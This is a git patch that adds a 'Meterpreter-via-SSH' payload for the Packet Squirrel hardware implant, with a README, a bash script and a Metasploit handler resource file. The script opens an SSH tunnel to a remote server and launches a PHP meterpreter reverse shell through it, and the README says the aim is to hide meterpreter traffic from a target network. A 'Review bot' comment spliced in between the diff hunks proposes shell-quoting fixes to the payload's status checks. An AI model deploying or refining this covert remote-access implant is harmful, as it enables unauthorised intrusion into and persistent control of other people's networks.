From 261fb62b1095852f94fce474cf1502d8e1112f4d Mon Sep 17 00:00:00 2001
From: Zappus
Date: Tue, 26 Dec 2017 23:53:25 -0500
Subject: [PATCH] added Meterpreter-via-SSH payload (#27)

---
 .../Meterpreter-via-SSH/README.md | 50 +++++++++++++
 .../Meterpreter-via-SSH/payload.sh | 74 +++++++++++++++++++
 .../Meterpreter-via-SSH/server.rc | 9 +++
 3 files changed, 133 insertions(+)
 create mode 100644 payloads/library/remote-access/Meterpreter-via-SSH/README.md
 create mode 100644 payloads/library/remote-access/Meterpreter-via-SSH/payload.sh
 create mode 100644 payloads/library/remote-access/Meterpreter-via-SSH/server.rc

diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/README.md b/payloads/library/remote-access/Meterpreter-via-SSH/README.md
new file mode 100644
index 0000000..f1fd182
--- /dev/null
+++ b/payloads/library/remote-access/Meterpreter-via-SSH/README.md
@@ -0,0 +1,50 @@
+# Meterpreter-via-SSH
+
+## Overview
+This payload starts Packet Squirrel in NAT mode and awaits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over said tunnel.
+
+The intent is to get a meterpreter shell on a target network in a way that hides meterpreter network traffic behind legitimate SSH activity.
+
+## Operational Design Considerations
+* Payload remains silent on the network until user presses the button.
+* Payload stops the SSH connection if meterpreter shell fails.
+* Payload always keeps only 1 copy of SSH+meterpreter processes running (even if the button is pressed many times).
+
+## Getting Started
+Copy the payload to Packet Squirrel into desired switch folder, then edit the script to configure your server options:
+* SSH_USER - username on remote SSH server
+* SSH_HOST - ip/domain of remote SSH server
+
+In case you choose to change the default meterpreter port, don't forget to change it on the metasploit side as well.
+* MSF_PORT - port of meterpreter listener
+
+### Generate SSH Key on Squirrel
+You will likely have to generate an ssh key-pair (use default location and empty password) on your Packet Squirrel:
+```
+root@squirrel:~# ssh-keygen
+```
+### Allow Squirrel on SSH Server
+Then you will need to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH server authorized file:
+```
+user@server:~# mkdir ~/.ssh
+user@server:~# echo 'paste id_rsa.pub contents inside this quote' > ~/.ssh/authorized_keys
+```
+### Run Metasploit with Resource
+```
+msf@server:~# msfconsole -r server.rc
+```
+
+## LED Definitions
+1. Configure NETMODE
+* Solid Magenta
+2. Connect to SSH Server
+* SUCCESS - Blink Amber 5 Times
+* FAIL - Blink Red 2 Times
+3. Launch meterpreter
+* SUCCESS - Blink Cyan 1 Time
+* FAIL - Blink Red 1 Time
+
+## Hardening Recommendations
+1. Use an account with limited privileges for SSH access on the server.
+2. Use a dedicated account for Packet Squirrel device (audit usage with SSH access logs).
+3. Disable PasswordAuthentication in sshd_config on the server.
diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh b/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh
new file mode 100644
index 0000000..aae8991
--- /dev/null
+++ b/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh
@@ -0,0 +1,74 @@
+#!/bin/bash
+# Title: Meterpreter-via-SSH
+# Description: Covert meterpreter shell via overt SSH connection
+# Author: Zappus
+# Version: 1.0
+# Category: Remote-Access
+# Net Mode: NAT
+# Firmware: 1.2
+#
+# LED State Descriptions
+# Magenta Solid - Configuring NETMODE
+# LED OFF - Waiting for BUTTON
+# Red Blink 2 Times - SSH Connection Failed
+# Amber Blink 5 Times - SSH Connection Successful
+# Red Blink 1 Time - Meterpreter Failed
+# Cyan Blink 1 Time - Meterpreter Successful
+
+
+SSH_USER="username"
+SSH_HOST="hostname"
+MSF_PORT=31337
+
+function start()
+{
+ LED SETUP
+ NETMODE NAT
+ sleep 5
+ LED OFF
+
+ # Wait until BUTTON is pressed
+ while true
+ do
+ NO_LED=1 BUTTON && {
+ # close any existing meterpreter and SSH connections
+ kill `pgrep php` 2> /dev/null
+ kill `pgrep -x ssh` 2> /dev/null
+ sleep 2
+
+ # Establish connection to remote SSH server
+ ssh -f -N -T -M -L $MSF_PORT:127.0.0.1:$MSF_PORT $SSH_USER@$SSH_HOST
+
+ # Check if SSH connection worked
+ if [ -z `pgrep -x ssh` ]
+ then
+ LED FAIL
+ sleep 5
+ LED OFF
+ continue
+ else
+ LED STAGE1
+ sleep 5
+ fi
+
+ # Start meterpreter reverse shell
+ meterpreter-php 127.0.0.1 $MSF_PORT &
+ sleep 2
+
+ # Check if meterpreter shell started
+ if [ -z `pgrep php` ]
+ then
+ # Close SSH connection because meterpreter failed
+ kill `pgrep -x ssh` 2> /dev/null
+ LED FAIL
+ else
+ LED SPECIAL
+ fi
+ sleep 1
+ LED OFF
+ }
+ done
+}
+
+# Start the payload
+start &
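Review bot: The two `[ -z … ]` status tests on the output of pgrep in the payload.sh hunk are unreliable: the command substitution is unquoted, so when pgrep prints more than one PID the test receives extra words, `[` exits with status 2 ("binary operator expected"), and the `if` falls through to the success branch — a failed SSH step can still reach `LED STAGE1`, and a failed meterpreter step can still reach `LED SPECIAL`, while the "stops the SSH connection on failure" behaviour the README promises does not run. Quote the substitutions and drop the backticks: `if [ -z "$(pgrep -x ssh)" ]` and `if [ -z "$(pgrep php)" ]`. The same quoting applies to `$MSF_PORT` and `$SSH_USER@$SSH_HOST` on the ssh line, and the `kill` on pgrep output should also be quoted; note that `pgrep php` matches every php process on the device, not only the one this script starts, which the comment above it could state.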
diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/server.rc b/payloads/library/remote-access/Meterpreter-via-SSH/server.rc
new file mode 100644
index 0000000..c008aa1
--- /dev/null
+++ b/payloads/library/remote-access/Meterpreter-via-SSH/server.rc
@@ -0,0 +1,9 @@
+use exploit/multi/handler
+set payload php/meterpreter/reverse_tcp
+set EnableContextEncoding false
+set DisablePayloadHandler false
+set ExitOnSession false
+set ListenerTimeout 0
+set LHOST 127.0.0.1
+set LPORT 31337
+run -j